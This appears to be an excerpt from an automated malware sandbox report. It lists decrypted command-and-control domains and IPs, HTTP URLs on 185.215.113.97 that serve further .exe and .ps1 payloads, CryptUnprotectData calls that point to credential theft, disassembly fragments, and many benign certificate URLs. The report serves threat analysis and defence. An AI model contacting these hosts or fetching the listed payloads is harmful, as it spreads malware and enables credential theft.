Source: 0000000C.00000002.78962753509.0000000003B79000.00000004.00000800.00020000.00000000.sdmp	String decryptor: rebeldettern.com
Source: 0000000C.00000002.78962753509.0000000003B79000.00000004.00000800.00020000.00000000.sdmp	String decryptor: actiothreaz.com
Source: 0000000C.00000002.78962753509.0000000003B79000.00000004.00000800.00020000.00000000.sdmp	String decryptor: garulouscuto.com
Source: 0000000C.00000002.78962753509.0000000003B79000.00000004.00000800.00020000.00000000.sdmp	String decryptor: breedertremnd.com

Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_00419A00 CryptUnprotectData,	13_2_00419A00
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0041DC30 CryptUnprotectData,	13_2_0041DC30
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 13_2_0041A55C CryptUnprotectData,	13_2_0041A55C

Source: Mc3FDUMnVz.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: Purpose.pdb source: Ryu8yUx.exe, 0000000C.00000002.78962753509.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, Ryu8yUx.exe, 0000000C.00000000.78919175290.00000000006A2000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: UN8QxIq.exe, 00000011.00000002.79041042505.00007FF6E0001000.00000040.00000001.01000000.0000000E.sdmp, covxzxzipzly.exe, 0000003A.00000002.79057637370.00007FF602461000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: UN8QxIq.exe, UN8QxIq.exe, 00000011.00000002.79041042505.00007FF6E0001000.00000040.00000001.01000000.0000000E.sdmp, covxzxzipzly.exe, covxzxzipzly.exe, 0000003A.00000002.79057637370.00007FF602461000.00000040.00000001.01000000.0000000F.sdmp

Source: C:\Windows\System32\svchost.exe

Code function: 14_2_0000028559F2DCE0 FindFirstFileExW,

14_2_0000028559F2DCE0

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\

Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov ebx, ecx	13_2_0040F060
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+0Ch]	13_2_0043E150
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov edx, ecx	13_2_0043E150
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then push esi	13_2_00419A00
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then jmp eax	13_2_00419A00
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then cmp word ptr [esi+eax], 0000h	13_2_00419A00
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov eax, ebx	13_2_0040FB9E
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then lea edx, dword ptr [ecx+01h]	13_2_0040F4DA
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov word ptr [edi], ax	13_2_0040FD7A
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 4802CC78h	13_2_0041DEF0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+04h]	13_2_0041DEF0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov esi, ecx	13_2_0041DEF0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov edi, ecx	13_2_0041DEF0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov ecx, eax	13_2_00443EA7
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov word ptr [ecx], dx	13_2_004436B9
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edi+3D954FEDh]	13_2_0040CFD3
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov byte ptr [ebx], cl	13_2_00431800
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then cmp byte ptr [edi+eax+01h], 00000000h	13_2_0042D831
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov esi, eax	13_2_0041A8BA
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then lea edi, dword ptr [esi+esi]	13_2_0043314D
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov word ptr [ebx], cx	13_2_00426150
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then movzx eax, byte ptr [ecx+esi]	13_2_00429970
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov ecx, eax	13_2_0042B175
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+16h]	13_2_0040C920
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	13_2_004019E0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then push eax	13_2_004431FF
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	13_2_0040A240
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	13_2_0040A240
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	13_2_00430A40
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	13_2_0043B250
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_0041FA3E
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+759F8BA2h]	13_2_00444280
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then lea edi, dword ptr [esi+esi]	13_2_004330DC
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then cmp word ptr [ebp+eax+00h], 0000h	13_2_00420AB0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	13_2_00423340
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then movsx edx, byte ptr [esi+eax]	13_2_00418B60
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 089E115Eh	13_2_00445B00
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+0C61266Ch]	13_2_00445B00
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov ecx, eax	13_2_0041F3C0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then push esi	13_2_0042B3D3
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx+06h]	13_2_0040E380
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov ecx, eax	13_2_0040DB91
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+2F3FA6E8h]	13_2_00441BA0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C1F0655h	13_2_00441BA0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov esi, ecx	13_2_0041BC47
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov esi, ecx	13_2_0041A733
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh	13_2_00418C20
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then jmp eax	13_2_00418C20
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], E40A7173h	13_2_00418C20
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov byte ptr [edx], bl	13_2_0040C4C0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov esi, ecx	13_2_0041BCF6
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx-07h]	13_2_0042ED44
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov ecx, eax	13_2_0042ED44
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov esi, eax	13_2_0041B500
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx+02h]	13_2_00442D3C
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh	13_2_00426650
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+1D78B1A5h]	13_2_0041FE58
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], B130B035h	13_2_00445E70
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then dec ebx	13_2_00444625
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], E389C079h	13_2_0043EE20
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov word ptr [ecx], bp	13_2_00420F54
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then movzx edi, byte ptr [esi+ecx]	13_2_0042DF66
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov word ptr [ecx], bp	13_2_00420F67
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov byte ptr [ebx], cl	13_2_00431703
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	13_2_00430F10
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	13_2_0042F7E0
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then mov esi, ecx	13_2_0041AFF7
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	13_2_00402780
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+000000EFh]	13_2_0041BF8A

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 103.214.142.152:26264
Source: Malware configuration extractor	IPs: 185.215.113.43
Source: Malware configuration extractor	URLs: importenptoc.com
Source: Malware configuration extractor	URLs: voicesharped.com
Source: Malware configuration extractor	URLs: inputrreparnt.com
Source: Malware configuration extractor	URLs: torpdidebar.com
Source: Malware configuration extractor	URLs: rebeldettern.com
Source: Malware configuration extractor	URLs: actiothreaz.com
Source: Malware configuration extractor	URLs: garulouscuto.com
Source: Malware configuration extractor	URLs: breedertremnd.com

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 52.168.117.173 52.168.117.173

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Ryu8yUx.exe, 0000000D.00000002.79066561966.00000000015C3000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)

Source: skotes.exe, 00000004.00000003.80123400430.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000004.00000003.80123400430.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/1506757897/tYliuwV.ps1
Source: skotes.exe, 00000004.00000003.80123400430.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/2116916553/WveK4j1.exe
Source: skotes.exe, 00000004.00000003.81730967305.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/2116916553/WveK4j1.exeA&
Source: skotes.exe, 00000004.00000003.80123400430.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000003.81730967305.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/2116916553/WveK4j1.exeUUC:
Source: skotes.exe, 00000004.00000003.80123400430.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/5643377291/7fOMOTQ.exe
Source: skotes.exe, 00000004.00000003.81730967305.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/5765828710/ViGgA8C.exeAC
Source: skotes.exe, 00000004.00000003.80123400430.0000000000F06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/5801179114/UN8QxIq.exe
Source: skotes.exe, 00000004.00000003.80123400430.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/5801179114/UN8QxIq.exe7/files/5801179114/UN8QxIq.exeUUC:
Source: skotes.exe, 00000004.00000003.80807161788.0000000005BD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/c0dxnfz/random.exe
Source: skotes.exe, 00000004.00000003.82488334225.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000003.80808222885.0000000005C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: lsass.exe, 00000039.00000000.79033133066.0000026AB4E85000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 00000039.00000000.79034005111.0000026AB565E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.79594795937.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79033075547.0000026AB4E70000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.79462951251.0000026AB586F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.81409492796.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.82016506020.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79034361938.0000026AB57ED000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.79836902858.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.81194730901.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.79430612177.0000026AB586D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.80220021652.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.80154724509.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.80894060037.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79034720026.0000026AB583F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79033206639.0000026AB4EA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.79889810609.0000026AB586B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.80587747682.0000026AB586B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79034720026.0000026AB5800000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.80672020730.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.83870072580.0000026AB586B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79034854163.0000026AB5849000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 00000039.00000000.79034005111.0000026AB565E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: lsass.exe, 00000039.00000000.79033075547.0000026AB4E70000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79033133066.0000026AB4E85000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: skotes.exe, 00000004.00000003.82488334225.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000003.80808222885.0000000005C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: skotes.exe, 00000004.00000003.82488334225.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000003.80808222885.0000000005C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: skotes.exe, 00000004.00000003.82488334225.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000003.80808222885.0000000005C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000005.00000002.78887216593.0000000000953000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.78896959602.0000000000A33000.00000004.00000020.00020000.00000000.sdmp, Ryu8yUx.exe, 0000000D.00000002.79066038176.000000000154E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.79027390881.00000000071C0000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79034005111.0000026AB565E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000005.00000002.78887216593.0000000000953000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.78896959602.0000000000A33000.00000004.00000020.00020000.00000000.sdmp, Ryu8yUx.exe, 0000000D.00000002.79066038176.000000000154E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.79015068054.000000000095D000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79034005111.0000026AB565E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: skotes.exe, 00000004.00000003.82488334225.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000003.80808222885.0000000005C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: lsass.exe, 00000039.00000000.79033133066.0000026AB4E85000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 00000039.00000000.79034005111.0000026AB565E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.79594795937.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79033075547.0000026AB4E70000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.79462951251.0000026AB586F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.81409492796.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.82016506020.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79034361938.0000026AB57ED000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.79836902858.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.81194730901.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.79430612177.0000026AB586D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.80220021652.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.80154724509.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.80894060037.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79034720026.0000026AB583F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79033206639.0000026AB4EA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.79889810609.0000026AB586B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.80587747682.0000026AB586B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79034720026.0000026AB5800000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.80672020730.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.83870072580.0000026AB586B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79034854163.0000026AB5849000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000039.00000000.79034005111.0000026AB565E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: skotes.exe, 00000004.00000003.82488334225.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000003.80808222885.0000000005C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: skotes.exe, 00000004.00000003.82488334225.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000003.80808222885.0000000005C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: skotes.exe, 00000004.00000003.80808222885.0000000005C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: lsass.exe, 00000039.00000000.79033075547.0000026AB4E70000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79033133066.0000026AB4E85000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 00000039.00000000.79033133066.0000026AB4E85000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: skotes.exe, 00000004.00000003.82488334225.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000003.80808222885.0000000005C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: lsass.exe, 00000039.00000000.79033075547.0000026AB4E70000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79033133066.0000026AB4E85000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
Source: lsass.exe, 00000039.00000000.79034253303.0000026AB56E9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000039.00000000.79033688262.0000026AB5600000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000039.00000000.79032946445.0000026AB4E2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000039.00000000.79033006802.0000026AB4E4F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000039.00000003.83540853279.0000026AB564E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: lsass.exe, 00000039.00000003.83540853279.0000026AB564E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79033688262.0000026AB564F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79032946445.0000026AB4E2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000005.00000002.78893751401.0000000005F20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: skotes.exe, 00000004.00000003.82488334225.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000003.80808222885.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79034005111.0000026AB565E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.79594795937.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79033075547.0000026AB4E70000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79033133066.0000026AB4E85000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.79462951251.0000026AB586F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.81409492796.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.82016506020.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79034361938.0000026AB57ED000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.79836902858.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.81194730901.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.79430612177.0000026AB586D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.80220021652.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.80154724509.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.80894060037.0000026AB586E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79034720026.0000026AB583F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79033206639.0000026AB4EA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.79889810609.0000026AB586B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.80587747682.0000026AB586B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.79034720026.0000026AB5800000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
